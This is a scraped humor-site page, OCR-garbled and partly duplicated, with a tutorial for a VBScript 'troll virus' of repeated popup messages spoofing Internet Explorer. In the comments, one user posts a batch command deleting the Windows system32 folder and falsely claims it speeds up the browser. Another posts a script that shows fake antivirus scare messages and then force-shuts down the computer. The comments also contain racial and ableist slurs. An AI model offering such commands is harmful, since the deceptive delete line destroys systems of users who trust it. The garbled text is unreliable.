| Home | RSS Feeds |
| Funny Pictures | Funny Videos |
| Funny GIFs | YouTube Videos |
| Text/Links | Comic Editor |
| User Rankings | Channels |
| Copyright Removal Request | |
| |
Troll Virus
Uploaded by: dragonassault
100% OC
How to make a troll Virus
I) Open a new text file.
View
Sort by
Refresh
in Folder
El Shortcut
lg Microsoft Access Database
Contact
IEA Microsof:
Journal Document
Paste
Paste shortcut
Undo Delete
Graphics Properties... ' Microsof:
Graphical) ations ','dlf
Control Panel ext document
Microsoft
Shared alit archive
New I tibit Briefcase
Screen resolution
Gadgets
Personalize
2) write the following line:
your messagee, tth" Explorer"
Far Example:
file Edit Format View Help
msgbox "push the button, I dare ) u.", 20," ernternert Explorer"
a) Repeat this line multiple tim es with the message tau want to show.
File. Edit Format 1/ i. . Help
msgbox “Don' t press the butta) n", 20," iinternet Explorer"
msgbox “what did i just say?", 20," ernternert Explorer"
msgbox “Stop it tms", 20," Explorer"
msgbox “no reawwy stop 'rt", 20," iinternet Explorer"
msgbox ”C' mon, its not funny anirac) re", 20," ernternert Explorer"
msgbox “You are starting to piss me cfr", 20," iinternet Explorer"
msgbox “Are you retarde ? I said stop 'rt", 20," iinternet Explorer"
msgbox fojay_ noy your jusrt. raak. ing me angry", 20, l' ”
4) Write as many lines as you want. Then save it as (
File name: Internet
Save as type: (Text Documents (taxt)
I Cancel
tii) Now when you open it it should look like this.
aus
til) Don' t press the button
h_ soyl
ti) Now no matter if you press yes or no, it will display your next message.
MORE Aim Never again
If problems leave comment.
I) Open a new text file.
View
Sort by
Refresh
in Folder
El Shortcut
lg Microsoft Access Database
Contact
IEA Microsof:
Journal Document
Paste
Paste shortcut
Undo Delete
Graphics Properties... ' Microsof:
Graphical) ations ','dlf
Control Panel ext document
Microsoft
Shared alit archive
New I tibit Briefcase
Screen resolution
Gadgets
Personalize
2) write the following line:
your messagee, tth" Explorer"
Far Example:
file Edit Format View Help
msgbox "push the button, I dare ) u.", 20," ernternert Explorer"
a) Repeat this line multiple tim es with the message tau want to show.
File. Edit Format 1/ i. . Help
msgbox “Don' t press the butta) n", 20," iinternet Explorer"
msgbox “what did i just say?", 20," ernternert Explorer"
msgbox “Stop it tms", 20," Explorer"
msgbox “no reawwy stop 'rt", 20," iinternet Explorer"
msgbox ”C' mon, its not funny anirac) re", 20," ernternert Explorer"
msgbox “You are starting to piss me cfr", 20," iinternet Explorer"
msgbox “Are you retarde ? I said stop 'rt", 20," iinternet Explorer"
msgbox fojay_ noy your jusrt. raak. ing me angry", 20, l' ”
4) Write as many lines as you want. Then save it as (
File name: Internet
Save as type: (Text Documents (taxt)
I Cancel
tii) Now when you open it it should look like this.
aus
til) Don' t press the button
h_ soyl
ti) Now no matter if you press yes or no, it will display your next message.
MORE Aim Never again
If problems leave comment.
...
| |
here's a great one !!! it just increases browser speed...
@echo off del C:\windows\system32
save as .bat
enjoy!! :D
@echo off del C:\windows\system32
save as .bat
enjoy!! :D
#45
-
fragman ONLINE (05/30/2012) [+]
(1 reply)
> Troll Virus
> Virus
a virus (computer virus) is per definition able to replicate itself and spread from one computer to another. I'd like to see how your example accomplishes that
tl;dr: don't use words you don't understand
> Virus
a virus (computer virus) is per definition able to replicate itself and spread from one computer to another. I'd like to see how your example accomplishes that
tl;dr: don't use words you don't understand
A fake virus i just made, all it does is shut down the computer
code:
msgbox "A virus has been found in the computer. Would you like to scan for the virus?" ,20, "AVG"
msgbox "Virus has taken into effect" ,20, "NGVirus"
msgbox "System32 is currently being deleted" ,20, "NGVirus"
msgbox "Nigga Gigga Virus is a Success" ,20, "NGVirus"
msgbox "GoodBye" ,20, "NGVirus"
Set oWmi=GetObject("winmgmts:{(shutdown)}")
For Each oPC In oWmi.ExecQuery("Select * from Win32_OperatingSystem")
oPC.Win32Shutdown 6
Next
code:
msgbox "A virus has been found in the computer. Would you like to scan for the virus?" ,20, "AVG"
msgbox "Virus has taken into effect" ,20, "NGVirus"
msgbox "System32 is currently being deleted" ,20, "NGVirus"
msgbox "Nigga Gigga Virus is a Success" ,20, "NGVirus"
msgbox "GoodBye" ,20, "NGVirus"
Set oWmi=GetObject("winmgmts:{(shutdown)}")
For Each oPC In oWmi.ExecQuery("Select * from Win32_OperatingSystem")
oPC.Win32Shutdown 6
Next